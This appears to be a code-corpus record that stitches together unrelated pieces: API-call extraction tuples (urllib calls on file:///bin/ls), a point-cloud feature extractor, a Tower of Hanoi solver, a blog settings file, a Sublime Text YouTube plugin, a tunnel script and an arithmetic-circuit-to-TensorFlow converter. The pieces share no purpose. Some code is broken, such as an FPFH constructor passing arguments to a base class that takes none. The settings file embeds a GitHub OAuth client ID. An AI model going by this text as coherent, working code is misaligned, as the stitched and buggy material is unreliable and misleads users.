[((469, 499), 'urllib.quote', 'urllib.quote', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (481, 499), False, 'import urllib\n'), ((504, 535), 'urllib.urlopen', 'urllib.urlopen', (['url', '"""blah"""', '(32)'], {}), "(url, 'blah', 32)\n", (518, 535), False, 'import urllib\n'), ((540, 588), 'urllib.urlretrieve', 'urllib.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (558, 588), False, 'import urllib\n'), ((602, 620), 'urllib.URLopener', 'urllib.URLopener', ([], {}), '()\n', (618, 620), False, 'import urllib\n'), ((706, 729), 'urllib.FancyURLopener', 'urllib.FancyURLopener', ([], {}), '()\n', (727, 729), False, 'import urllib\n'), ((831, 861), 'urllib2.HTTPBasicAuthHandler', 'urllib2.HTTPBasicAuthHandler', ([], {}), '()\n', (859, 861), False, 'import urllib2\n'), ((1001, 1030), 'urllib2.build_opener', 'urllib2.build_opener', (['handler'], {}), '(handler)\n', (1021, 1030), False, 'import urllib2\n'), ((1035, 1065), 'urllib2.install_opener', 'urllib2.install_opener', (['opener'], {}), '(opener)\n', (1057, 1065), False, 'import urllib2\n'), ((1070, 1103), 'urllib2.urlopen', 'urllib2.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1085, 1103), False, 'import urllib2\n'), ((1108, 1141), 'urllib2.Request', 'urllib2.Request', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1123, 1141), False, 'import urllib2\n'), ((1162, 1202), 'urllib.request.urlopen', 'urllib.request.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1184, 1202), False, 'import urllib\n'), ((1207, 1263), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (1233, 1263), False, 'import urllib\n'), ((1277, 1303), 'urllib.request.URLopener', 'urllib.request.URLopener', ([], {}), '()\n', (1301, 1303), False, 'import urllib\n'), ((1389, 1420), 'urllib.request.FancyURLopener', 'urllib.request.FancyURLopener', ([], {}), '()\n', (1418, 1420), False, 'import urllib\n'), ((1508, 1558), 'six.moves.urllib.request.urlopen', 'six.moves.urllib.request.urlopen', (['"""file:///bin/ls"""'], {}), "('file:///bin/ls')\n", (1540, 1558), False, 'import six\n'), ((1563, 1629), 'six.moves.urllib.request.urlretrieve', 'six.moves.urllib.request.urlretrieve', (['"""file:///bin/ls"""', '"""/bin/ls2"""'], {}), "('file:///bin/ls', '/bin/ls2')\n", (1599, 1629), False, 'import six\n'), ((1643, 1679), 'six.moves.urllib.request.URLopener', 'six.moves.urllib.request.URLopener', ([], {}), '()\n', (1677, 1679), False, 'import six\n'), ((1765, 1806), 'six.moves.urllib.request.FancyURLopener', 'six.moves.urllib.request.FancyURLopener', ([], {}), '()\n', (1804, 1806), False, 'import six\n')]
|
import logging
import os
from abc import ABC
import gin
import MinkowskiEngine as ME
import numpy as np
import open3d as o3d
import torch
from src.models import get_model
class BaseFeatureExtractor(ABC):
def __init__(self):
logging.info(f"Initialize {self.__class__.__name__}")
def extract_feature(self, xyz):
raise NotImplementedError("Feature should implement extract_feature method.")
@gin.configurable()
class FCGF(BaseFeatureExtractor):
def __init__(self, voxel_size, checkpoint_path, device):
super().__init__()
self.voxel_size = voxel_size
self.device = device
assert os.path.exists(checkpoint_path), f"{checkpoint_path} not exists"
MODEL = get_model("ResUNetBN2C")
feat_model = MODEL(
1, 32, bn_momentum=0.05, conv1_kernel_size=7, normalize_feature=True
).to(device)
checkpoint = torch.load(checkpoint_path)
feat_model.load_state_dict(checkpoint["state_dict"])
self.feat_model = feat_model
self.feat_model.eval()
def freeze(self):
for param in self.feat_model.parameters():
param.requires_grad = False
def extract_feature(self, xyz, coords=None, feats=None):
if coords is None or feats is None:
# quantize input xyz.
coords, sel = ME.utils.sparse_quantize(
xyz / self.voxel_size, return_index=True
)
# make sparse tensor.
coords = ME.utils.batched_coordinates([coords])
feats = torch.ones((coords.shape[0], 1)).float()
sinput = ME.SparseTensor(
feats.to(self.device), coordinates=coords.to(self.device)
)
if isinstance(xyz, np.ndarray):
xyz = torch.from_numpy(xyz)
xyz = xyz[sel].float().to(self.device)
else:
sinput = ME.SparseTensor(coordinates=coords, features=feats)
# extract feature.
F = self.feat_model(sinput).F
return F, xyz
@gin.configurable()
class FPFH(BaseFeatureExtractor):
def __init__(self, voxel_size, device):
super().__init__(voxel_size, device)
def extract_feature(self, xyz):
voxel_size = self.voxel_size
if isinstance(xyz, torch.Tensor):
xyz = xyz.numpy()
# downsample
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
pcd = pcd.voxel_down_sample(voxel_size)
# calculate normals
radius_normal = voxel_size * 2.0
pcd.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30)
)
# calculate features
radius_feature = voxel_size * 5.0
pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(
pcd, o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100)
)
xyz = torch.from_numpy(np.asarray(pcd.points)).float()
F = torch.from_numpy(pcd_fpfh.data.copy().T).float().contiguous()
return F, xyz
MODELS = [FPFH, FCGF]
@gin.configurable()
def get_feature(name):
# Find the model class from its name
all_models = MODELS
mdict = {model.__name__: model for model in all_models}
if name not in mdict:
logging.info(f"Invalid model index. You put {name}. Options are:")
# Display a list of valid model names
for model in all_models:
logging.info("\t* {}".format(model.__name__))
return None
NetClass = mdict[name]
return NetClass
|
[
"torch.ones",
"MinkowskiEngine.SparseTensor",
"torch.load",
"MinkowskiEngine.utils.sparse_quantize",
"os.path.exists",
"open3d.geometry.PointCloud",
"numpy.asarray",
"logging.info",
"open3d.geometry.KDTreeSearchParamHybrid",
"gin.configurable",
"MinkowskiEngine.utils.batched_coordinates",
"src.models.get_model",
"open3d.utility.Vector3dVector",
"torch.from_numpy"
] |
[((420, 438), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (436, 438), False, 'import gin\n'), ((2034, 2052), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (2050, 2052), False, 'import gin\n'), ((3102, 3120), 'gin.configurable', 'gin.configurable', ([], {}), '()\n', (3118, 3120), False, 'import gin\n'), ((240, 293), 'logging.info', 'logging.info', (['f"""Initialize {self.__class__.__name__}"""'], {}), "(f'Initialize {self.__class__.__name__}')\n", (252, 293), False, 'import logging\n'), ((642, 673), 'os.path.exists', 'os.path.exists', (['checkpoint_path'], {}), '(checkpoint_path)\n', (656, 673), False, 'import os\n'), ((724, 748), 'src.models.get_model', 'get_model', (['"""ResUNetBN2C"""'], {}), "('ResUNetBN2C')\n", (733, 748), False, 'from src.models import get_model\n'), ((900, 927), 'torch.load', 'torch.load', (['checkpoint_path'], {}), '(checkpoint_path)\n', (910, 927), False, 'import torch\n'), ((2358, 2383), 'open3d.geometry.PointCloud', 'o3d.geometry.PointCloud', ([], {}), '()\n', (2381, 2383), True, 'import open3d as o3d\n'), ((2405, 2436), 'open3d.utility.Vector3dVector', 'o3d.utility.Vector3dVector', (['xyz'], {}), '(xyz)\n', (2431, 2436), True, 'import open3d as o3d\n'), ((3303, 3369), 'logging.info', 'logging.info', (['f"""Invalid model index. You put {name}. Options are:"""'], {}), "(f'Invalid model index. You put {name}. Options are:')\n", (3315, 3369), False, 'import logging\n'), ((1337, 1403), 'MinkowskiEngine.utils.sparse_quantize', 'ME.utils.sparse_quantize', (['(xyz / self.voxel_size)'], {'return_index': '(True)'}), '(xyz / self.voxel_size, return_index=True)\n', (1361, 1403), True, 'import MinkowskiEngine as ME\n'), ((1490, 1528), 'MinkowskiEngine.utils.batched_coordinates', 'ME.utils.batched_coordinates', (['[coords]'], {}), '([coords])\n', (1518, 1528), True, 'import MinkowskiEngine as ME\n'), ((1890, 1941), 'MinkowskiEngine.SparseTensor', 'ME.SparseTensor', ([], {'coordinates': 'coords', 'features': 'feats'}), '(coordinates=coords, features=feats)\n', (1905, 1941), True, 'import MinkowskiEngine as ME\n'), ((2597, 2666), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (2633, 2666), True, 'import open3d as o3d\n'), ((2834, 2905), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (2870, 2905), True, 'import open3d as o3d\n'), ((1782, 1803), 'torch.from_numpy', 'torch.from_numpy', (['xyz'], {}), '(xyz)\n', (1798, 1803), False, 'import torch\n'), ((1549, 1581), 'torch.ones', 'torch.ones', (['(coords.shape[0], 1)'], {}), '((coords.shape[0], 1))\n', (1559, 1581), False, 'import torch\n'), ((2947, 2969), 'numpy.asarray', 'np.asarray', (['pcd.points'], {}), '(pcd.points)\n', (2957, 2969), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import math
import copy
from collections import namedtuple
Move = namedtuple('Move', 'source, target, disc')
def hanoi(discs):
seen = set()
def __solve(rods, depth=0):
if len(rods[2]) == discs:
return []
if rods in seen:
return None
seen.add(rods)
best = None
least_moves = math.inf
for source in range(len(rods)):
if not rods[source]:
continue
disc = rods[source][-1]
for target in range(len(rods)):
if ((source == target) or
(rods[target] and disc > rods[target][-1])):
continue
copied = []
for i, p in enumerate(rods):
if i == source:
copied.append(p[:-1])
elif i == target:
copied.append(tuple(list(p) + [disc]))
else:
copied.append(p)
moves = __solve(tuple(copied), depth + 1)
if moves is not None and len(moves) < least_moves:
best = [Move(source, target, disc)] + moves
least_moves = len(moves)
return best
return __solve(tuple([
tuple(n for n in range(discs - 1, -1, -1)),
tuple([]),
tuple([])
]))
def main():
print(len(hanoi(3)))
if __name__ == '__main__':
main()
|
[
"collections.namedtuple"
] |
[((116, 158), 'collections.namedtuple', 'namedtuple', (['"""Move"""', '"""source, target, disc"""'], {}), "('Move', 'source, target, disc')\n", (126, 158), False, 'from collections import namedtuple\n')]
|
import os
import configparser
import yaml
import ast
from pathlib import Path
HERE = Path(__file__).parent.absolute()
print(HERE)
config_dir = HERE / 'config/config.ini.model'
config = configparser.ConfigParser()
config.read(config_dir)
ACCESS_TOKEN_EXPIRE_MINUTES = config.get('security', 'access_token_expire_minutes')
JWT_ALGORITHM = config.get('security', 'jwt_algorithm')
OAUTH_REDIRECT_PATH = config.get('github', 'oauth_redirect_path')
REDIRECT_URI = config.get('github', 'redirect_uri')
CLIENT_ID = config.get('github', 'client_id')
CLIENT_SECRET = config.get('github', 'client_secret')
HOST_PATH = config.get('global', 'host_path')
WEB_PORT = config.get('port', "fastapi")
# DB_URL = os.getenv('DB_URL', config.get('database', 'db_url'))
db_host = config.get('database', 'host')
db_username = config.get('database', 'username')
db_pwd = config.get('database', 'password')
db_port = config.get('database', 'port')
db = config.get('database', 'db')
charset = config.get('database', 'charset')
DB_URL = f'mysql+pymysql://{db_username}:{db_pwd}@{db_host}:{db_port}/{db}?charset={charset}'
print(DB_URL)
REDIS_URL = os.getenv('REDIS_URL',
config.get('redis', 'redis_url'))
DEBUG = os.getenv('DEBUG', config.get('global', 'debug')).lower() \
in ('true', 'y', 'yes', '1')
WTF_CSRF_SECRET_KEY = 123
AUTH_LOGIN_ENDPOINT = 'index.login'
MEMCACHED_HOST = os.getenv('MEMCACHED_HOST',
config.get('memcached', 'memcached_host'))
MEMCACHED_PORT = config.get('memcached', 'memcached_port')
oauth_redirect_path = '/oauth'
redirect_uri = 'http://127.0.0.1:8000/oauth'
client_id = "098a2e6da880878e05da"
client_secret = "<KEY>"
REACT_PROMPT = '喜欢这篇文章吗? 记得给我留言或订阅哦'
PLOAD_FOLDER = HERE / 'static/upload'
AUTHOR = 'zhikai'
SITE_TITLE = 'Zhikai-Yang Space'
PER_PAGE = 10
GOOGLE_ANALYTICS = ''
SENTRY_DSN = ''
REQUEST_TIMEOUT = 15
SHOW_PAGEVIEW = True
PERMALINK_TYPE = 'slug' # 可选 id、slug、title
# [(Endpoint, Name, IconName, Color), ...]
# SITE_NAV_MENUS = [('blog.index', '首页'), ('blog.topics', '专题'),
# ('blog.archives', '归档'), ('blog.tags', '标签'),
# ('index.search', '搜索'), ('/page/aboutme', '关于我'),
# ('index.feed', 'RSS', 'rss', '#fc6423')]
SITE_NAV_MENUS = [('blog.index', '首页'),
('blog.activities', '动态'),
('blog.tags', '标签'),
('index.search', '搜索'),
('blog.archives', '归档'),
('/post/aboutme', '关于我')
]
BEIAN_ID = ''
JWT_SECRET = config.get('security', 'jwt_secret')
EXPIRATION_DELTA = 60 * 60
WTF_CSRF_ENABLED = False
MAIL_SERVER = 'smtp.qq.com'
MAIL_PORT = 465
MAIL_USERNAME = ''
MAIL_PASSWORD = ''
BLOG_URL = 'https://example.com'
UPLOAD_FOLDER = HERE / 'static/upload'
# Redis sentinel
REDIS_SENTINEL_SERVICE_HOST = None
REDIS_SENTINEL_SERVICE_PORT = 26379
SHOW_AUTHOR = True
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__dict__ = self
try:
with open(HERE / 'config.yaml') as f:
yaml_content = f.read()
partials = AttrDict(yaml.load(yaml_content)).partials
USE_YAML = True
except FileNotFoundError:
USE_YAML = False
partials = {}
try:
from local_settings import * # noqa
except ImportError:
pass
K_POST = 1001
K_COMMENT = 1002
ONE_MINUTE = 60
ONE_HOUR = ONE_MINUTE * 60
ONE_DAY = ONE_HOUR * 24
K_STATUS = 1003
K_ACTIVITY = 1004
CDN_DOMAIN = ''
USE_FFMPEG = False
STATIC_FILE_TYPES = ('jpg', 'png', 'webp', 'gif', 'mp4', 'css', 'js')
|
[
"pathlib.Path",
"configparser.ConfigParser",
"yaml.load"
] |
[((187, 214), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (212, 214), False, 'import configparser\n'), ((87, 101), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (91, 101), False, 'from pathlib import Path\n'), ((3142, 3165), 'yaml.load', 'yaml.load', (['yaml_content'], {}), '(yaml_content)\n', (3151, 3165), False, 'import yaml\n')]
|
import sublime
import sublime_plugin
import os
from ..lib import log, setup_log_panel, yte_setting, dotty
from ..lib import select_video, select_playlist, select_tag, select_timecode
from ..lib import Request, NetworkManager, stored_credentials_path, video_sort
# TODO:
# - Hit the keyword in the first few lines and 2-3 times total
# - The first few lines (how much?) are shown above the fold
# - Tags is 500 characters long, no more than 30 characters per tag
# - Tags with spaces may count as having a length + 2 because internally
# they're wrapped in quotes and that counts against the length
# - Tags should include brand related and channel tags for more relvance
# - Chapters: first must be at 0:00; there has to be at least 3 in ascending
# order, and the minimum length of a chapter is 10 seconds. There is no
# official doc on what the text should look like, but observably it seems to
# ignore leading punctuatuion, as in "00:00 - Introduction" the " - " is
# skipped (though starting it with a literal " gets it added, so there's
# that)
###----------------------------------------------------------------------------
# Our global network manager object
netManager = None
###----------------------------------------------------------------------------
# The uploads playlist doesn't appear in the list of playlists associated with
# a user because it's channel specific and not user specific. This is a sample
# dotty entry with just enough information to allow for populating that
# playlist into a chooser.
#
# The actual ID of the placeholder needs to be established at the point where
# the data is actually collected.
_upload_template = {
"id": "placeholder",
"snippet": {
"title": "Uploaded Videos"
},
"status": {
"privacyStatus": "private",
},
"contentDetails": {
# We don't know how many items are in the uploads playlist until we
# fetch the contents of it. The display code in the chooser will use
# markup to tell the user the list size is unknown in this case.
# "itemCount": 0
}
}
###----------------------------------------------------------------------------
def loaded():
"""
Initialize our plugin state on load.
"""
global netManager
for window in sublime.windows():
setup_log_panel(window)
log("PKG: YouTubeEditor loaded")
yte_setting.obj = sublime.load_settings("YouTubeEditor.sublime-settings")
yte_setting.default = {
"camtasia_folder": os.path.expanduser("~"),
"auto_show_panel": 2,
"report_output_to_view": False,
"cache_downloaded_data": True,
"encrypt_cache": False,
"client_id": "",
"client_secret": "",
"auth_uri": "",
"token_uri": ""
}
netManager = NetworkManager()
def unloaded():
"""
Clean up plugin state on unload.
"""
global netManager
if netManager is not None:
netManager.shutdown()
netManager = None
def youtube_has_credentials():
"""
Determine if there are stored credentials for a YouTube login; this
indicates that the user has previously gone through the login steps to
authorize the plugin with YouTube.
"""
return netManager.has_credentials()
def youtube_is_authorized():
"""
Determine if the plugin is currently authorized or not. This indicates not
only that the user has previously authorizaed the plugin on YouTube, but
also that a request has been made that has validated (and potentially
refreshed) our access token. If this is not the case, requests will fail.
"""
return netManager.is_authorized()
def youtube_request(request, handler, reason, callback, **kwargs):
"""
Dispatch a request to collect data from YouTube, invoking the given
callback when the request completes. The request will store the given
handler and all remaining arguments as arguments to the request dispatched.
"""
netManager.request(Request(request, handler, reason, **kwargs), callback)
###----------------------------------------------------------------------------
class YoutubeRequest():
"""
This class abstracts away the common portions of using the NetworkManager
to make requests and get responses back.
A request can be made via the `request()` method, and the result will
be automatically directed to a method in the class. The default handler
is the name of the request preceeded by an underscore.
"""
auth_req = None
auth_resp = None
run_args = None
def run(self, **kwargs):
self.run_args = kwargs
if not youtube_is_authorized():
self.request("authorize", "_internal_auth", "Authorizing")
else:
self._authorized(self.auth_req, self.auth_resp)
def _internal_auth(self, request, result):
self.auth_req = request
self.auth_resp = result
self._authorized(self.auth_req, self.auth_resp)
def request(self, request, handler=None, reason=None, **kwargs):
youtube_request(request, handler, reason, self.result, **kwargs)
def result(self, request, success, result):
attr = request.handler if success else "_error"
if not hasattr(self, attr):
raise RuntimeError("'%s' has no handler for request '%s'" % (
self.name(), request.name))
handler = getattr(self, attr)
handler(request, result)
def _error(self, request, result):
log("Err: in '{0}': {2} (code={1})", request.name,
result['error.code'], result['error.message'], display=True)
# Assume that most commands want to only enable themselves when there are
# credentials; commands that are responsible for obtaining credentials
# override this method.
def is_enabled(self, **kwargs):
return youtube_has_credentials()
###----------------------------------------------------------------------------
class YouTubeVideoSelect(YoutubeRequest):
"""
This class is a specialization on YoutubeRequest that specifically presumes
that the ultimate goal is to have the user select a video for some purpose.
The sequence of items here is:
- Gather channel information
- Gather list of playlists and prompt (or; assume uploads playlist)
- Gather contents of selected playlist
- Prompt by tags on videos in the playlist (optional based on args)
- Prompt for a video (either in the tags or in the playlist)
- Prompt for a timecode in the video (if any)
"""
# These values control what the placeholder text in the various quick
# panels will be for each of the given operations. The default value of
# None defers the placeholder to the utility functions in the utils.py
# file.
#
# video_tag_placeholder takes an optional format of {tag} to specify the
# tag that was chosen to get to this video list.
#
# timecode_placeholder takes an optional format of {title} to specify the
# title of the video the user is selecting a timecode from.
playlist_placeholder = None
tag_placeholder = None
video_placeholder = None
video_tag_placeholder = None
timecode_placeholder = None
def _authorized(self, request, result):
self.use_tags = self.run_args.get("by_tags", False)
self.use_playlists = self.run_args.get("by_playlists", False)
self.request("channel_list", reason="Get Channel Info")
def _channel_list(self, request, result):
self.channel = result[0]
# Make a fake playlist from a template; populate it with the public
# video count. The count will be adjusted later if/when the user
# browses into the Uploads playlist.
self.uploads_playlist = dotty.dotty(_upload_template)
self.uploads_playlist['contentDetails.itemCount'] = self.channel['statistics.videoCount']
self.uploads_playlist['id'] = self.channel['contentDetails.relatedPlaylists.uploads']
if self.use_playlists:
self.request("playlist_list", channel_id=self.channel['id'],
reason="Get user playlists")
else:
self.pick_playlist(self.uploads_playlist)
def _playlist_list(self, request, result):
self.playlists = video_sort(result, 'snippet.title')
self.playlists.insert(0, self.uploads_playlist)
select_playlist(self.playlists, self.pick_playlist,
placeholder=self.playlist_placeholder)
def _playlist_contents(self, request, result):
if self.use_tags:
select_tag(result, self.pick_tag, show_back=self.use_playlists,
placeholder=self.tag_placeholder)
else:
# If this is the uploads playlist, update the video count to
# include non-public videos.
if request["playlist_id"] == self.uploads_playlist['id']:
self.uploads_playlist['contentDetails.itemCount'] = len(result)
# Pass the video list as the tag_list to the lambda so it can be
# picked up and used again if the user goes back while editing the
# timecode.
videos = video_sort(result, "statistics.viewCount", int, True)
select_video(videos, lambda vid: self.select_video(vid, None, videos),
show_back=self.use_playlists,
placeholder=self.video_placeholder)
def pick_playlist(self, playlist):
if playlist != None:
self.request("playlist_contents",
reason="Get playlist contents",
playlist_id=playlist['id'])
def pick_tag(self, tag, tag_list):
if tag is not None:
if tag == "_back":
if self.use_playlists:
return select_playlist(self.playlists, self.pick_playlist,
placeholder=self.playlist_placeholder)
videos = video_sort(tag_list[tag], "statistics.viewCount", int, True)
# Use the default, unless we have a specific placeholder for this.
placeholder = (None if not self.video_tag_placeholder else
self.video_tag_placeholder.format(tag=tag))
# Video ID is in contentDetails.videoId for short results or id for
# full details (due to it being a different type of request)
select_video(videos, lambda vid: self.select_video(vid, tag, tag_list),
show_back=True, placeholder=placeholder)
def select_video(self, video, tag, tag_list):
if video is None:
return
if video['id'] == "_back":
# When using both tags and playlists, the browse order should send
# us back to tags first and from there to playlists.
if self.use_tags:
return select_tag(None, self.pick_tag, self.use_playlists, tag_list,
placeholder=self.tag_placeholder)
return select_playlist(self.playlists, self.pick_playlist,
placeholder=self.playlist_placeholder)
self.picked_video(video, tag, tag_list)
def pick_toc(self, timecode, text, video, tag, tag_list):
if timecode != None:
if timecode == "_back":
if self.use_tags:
return self.pick_tag(tag, tag_list)
else:
return select_video(tag_list, lambda vid: self.select_video(vid, None, None),
show_back=self.use_playlists,
placeholder=self.video_placeholder)
self.picked_toc(timecode, text, video)
def picked_video(self, video, tag, tag_list):
"""
Override this if you want to know what video the user selected; the
default will continue on to prompt the user for a timecode contained
in the video instead.
video represents the video chosen by the user, and tag is the tag they
chose (if prompted; otherwise it is None). The tag_list argument should
be ignored by outside code, as its value and use changes depending on
how the user is browsing around in the content.
"""
placeholder = (None if not self.timecode_placeholder else
self.timecode_placeholder.format(title=video['snippet.title']))
select_timecode(video, lambda a, b: self.pick_toc(a, b, video, tag, tag_list),
show_back=True, placeholder=placeholder)
def picked_toc(self, timecode, text, video):
"""
Override this if you want to know what timecode the user selected from
the table of contents of their selected video. You get told the
timecode string, the text of the TOC entry associated with it, and the
information on the video the user selected.
"""
pass
###----------------------------------------------------------------------------
|
[
"sublime.windows",
"sublime.load_settings",
"os.path.expanduser"
] |
[((2314, 2331), 'sublime.windows', 'sublime.windows', ([], {}), '()\n', (2329, 2331), False, 'import sublime\n'), ((2426, 2481), 'sublime.load_settings', 'sublime.load_settings', (['"""YouTubeEditor.sublime-settings"""'], {}), "('YouTubeEditor.sublime-settings')\n", (2447, 2481), False, 'import sublime\n'), ((2537, 2560), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (2555, 2560), False, 'import os\n')]
|
#!/usr/bin/env python3
from argparse import ArgumentParser
from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst
import logging
import signal
import requests
import socket
def main():
parser = ArgumentParser()
parser.add_argument("--bridge", type=str)
parser.add_argument("remoteIP", type=str)
args = parser.parse_args()
try:
args.remoteIP = socket.gethostbyname(args.remoteIP)
except:
logging.error("Unabled to resolve remote host: {}".format(args.remoteIP))
return
src = srcAddressForDst(args.remoteIP)
if src is None:
logging.error("Could not determine source address for destination {}.".format(args.remoteIP))
return
response = requests.get("http://{}:5000/connect".format(args.remoteIP))
if response.status_code != 200:
logging.error("Could not connect to server: HTTP {}: {}", response.status_code, response.text)
return
startTunnel(args.remoteIP, src, args.bridge)
try:
signal.pause()
except KeyboardInterrupt:
stopTunnel(args.remoteIP)
if __name__ == "__main__":
main()
|
[
"logging.error",
"argparse.ArgumentParser",
"signal.pause",
"socket.gethostbyname",
"util.startTunnel",
"util.srcAddressForDst",
"util.stopTunnel"
] |
[((227, 243), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (241, 243), False, 'from argparse import ArgumentParser\n'), ((561, 592), 'util.srcAddressForDst', 'srcAddressForDst', (['args.remoteIP'], {}), '(args.remoteIP)\n', (577, 592), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n'), ((970, 1014), 'util.startTunnel', 'startTunnel', (['args.remoteIP', 'src', 'args.bridge'], {}), '(args.remoteIP, src, args.bridge)\n', (981, 1014), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n'), ((401, 436), 'socket.gethostbyname', 'socket.gethostbyname', (['args.remoteIP'], {}), '(args.remoteIP)\n', (421, 436), False, 'import socket\n'), ((851, 950), 'logging.error', 'logging.error', (['"""Could not connect to server: HTTP {}: {}"""', 'response.status_code', 'response.text'], {}), "('Could not connect to server: HTTP {}: {}', response.\n status_code, response.text)\n", (864, 950), False, 'import logging\n'), ((1032, 1046), 'signal.pause', 'signal.pause', ([], {}), '()\n', (1044, 1046), False, 'import signal\n'), ((1085, 1110), 'util.stopTunnel', 'stopTunnel', (['args.remoteIP'], {}), '(args.remoteIP)\n', (1095, 1110), False, 'from util import startTunnel, stopTunnel, addressesForInterface, srcAddressForDst\n')]
|
## This file converts ac to tensorflow graph
## It takes as input a pickle file which contains the AC as a dictionary
## Each value in the dictionary is node_obj class object from Nimish's graph_analysis project
import tensorflow as tf
import pickle
import networkx as nx
import random
import numpy as np
def load_ac(ac):
fname= './gr_files/' + ac + '.p'
with open(fname, 'rb') as fp:
graph= pickle.load(fp, encoding='latin1')
fp.close()
fname= './gr_nx_files/' + ac + '_gr.p_nx5ALL_0.00.05.03333_33322_332222_3222222_22222222'
with open(fname, 'rb') as fp:
graph_nx= pickle.load(fp)
return graph, graph_nx
def ac_to_tf(ac, batch_size):
"""
Reads pickled ac, converts it to tf graph
"""
print('Constructing TF graph from AC')
graph, graph_nx= load_ac(ac)
#-- Convert ac to tf
tf_dict= {}
root= None
num_ops= 0
print("total node in AC:", graph_nx.number_of_nodes())
weight_cnt= 0
ind_cnt= 0
for node in nx.topological_sort(graph_nx):
# print(node, end=',')
obj= graph[node]
if obj.is_leaf():
assert len(list(graph_nx.in_edges(node))) == 0
# if len(list(graph_nx.in_edges(node))) == 0: # Leaf node
# curr= tf.Variable(tf.random_normal([batch_size,batch_size]), name= 'in')
# curr= tf.Variable(tf.convert_to_tensor([[[random.random()]*batch_size]*batch_size]), name= 'in')
# curr= tf.Variable(tf.convert_to_tensor(np.full((batch_size, batch_size), random.random())), name= 'in')
leaf_type= None
IND= 0
WEIGHT= 1
siblings= set([ch for parent in obj.parent_key_list for ch in graph[parent].child_key_list])
siblings= siblings - set([node])
siblings_WEIGHT= False
siblings_INDICATOR= False
for sib in siblings:
if graph[sib].is_weight():
siblings_WEIGHT= True
if graph[sib].is_indicator():
siblings_INDICATOR= True
if siblings_INDICATOR == True and siblings_WEIGHT == True:
break
# assert not (siblings_WEIGHT == True and siblings_INDICATOR == True)
if siblings_WEIGHT == True:
leaf_type= IND
elif siblings_INDICATOR == True:
leaf_type= WEIGHT
if leaf_type== None:
if len(obj.parent_key_list) == 1:
leaf_type= WEIGHT
else:
leaf_type= IND
if leaf_type == IND:
ind_cnt += 1
obj.leaf_type= obj.LEAF_TYPE_INDICATOR
curr= tf.Variable(tf.convert_to_tensor(np.full((1, batch_size), random.random(), dtype= np.float32)), name= 'ind')
elif leaf_type== WEIGHT:
weight_cnt += 1
obj.leaf_type= obj.LEAF_TYPE_WEIGHT
curr= tf.constant([random.random()], name= 'weight')
else:
assert 0
else: # sum or product
# assert len(obj.child_key_list) == 2, "AC should be binary"
# ch_0= tf_dict[obj.child_key_list[0]]
# ch_1= tf_dict[obj.child_key_list[1]]
#
# if obj.operation_type == 1:
# curr= tf.multiply(ch_0, ch_1, 'mul')
# elif obj.operation_type == 2:
# curr= tf.add(ch_0, ch_1, 'mul')
# else:
# assert 0
#
# if len(obj.parent_key_list) == 0:
# assert root== None
# root= node
# tf_root= curr
children= list(graph_nx.predecessors(node))
parents= list(graph_nx.successors(node))
ch_0= tf_dict[children[0]]
ch_1= tf_dict[children[1]]
if random.randint(0,2):
curr= tf.multiply(ch_0, ch_1, 'mul')
else:
curr= tf.add(ch_0, ch_1, 'add')
if len(parents) == 0:
assert root == None
root= node
tf_root= curr
num_ops += 1
tf_dict[node]= curr
print("Indicator cnt, Weight Cnt:", ind_cnt, weight_cnt)
assert root != None
assert len(tf_dict) == len(graph_nx)
return tf_root, num_ops
|
[
"random.randint",
"networkx.topological_sort",
"tensorflow.add",
"tensorflow.multiply",
"random.random",
"pickle.load"
] |
[((979, 1008), 'networkx.topological_sort', 'nx.topological_sort', (['graph_nx'], {}), '(graph_nx)\n', (998, 1008), True, 'import networkx as nx\n'), ((409, 443), 'pickle.load', 'pickle.load', (['fp'], {'encoding': '"""latin1"""'}), "(fp, encoding='latin1')\n", (420, 443), False, 'import pickle\n'), ((601, 616), 'pickle.load', 'pickle.load', (['fp'], {}), '(fp)\n', (612, 616), False, 'import pickle\n'), ((3442, 3462), 'random.randint', 'random.randint', (['(0)', '(2)'], {}), '(0, 2)\n', (3456, 3462), False, 'import random\n'), ((3479, 3509), 'tensorflow.multiply', 'tf.multiply', (['ch_0', 'ch_1', '"""mul"""'], {}), "(ch_0, ch_1, 'mul')\n", (3490, 3509), True, 'import tensorflow as tf\n'), ((3538, 3563), 'tensorflow.add', 'tf.add', (['ch_0', 'ch_1', '"""add"""'], {}), "(ch_0, ch_1, 'add')\n", (3544, 3563), True, 'import tensorflow as tf\n'), ((2517, 2532), 'random.random', 'random.random', ([], {}), '()\n', (2530, 2532), False, 'import random\n'), ((2694, 2709), 'random.random', 'random.random', ([], {}), '()\n', (2707, 2709), False, 'import random\n')]
|
import os
import json
import glob
import pandas as pd
from typing import Dict, Type, Any
import ConfigSpace
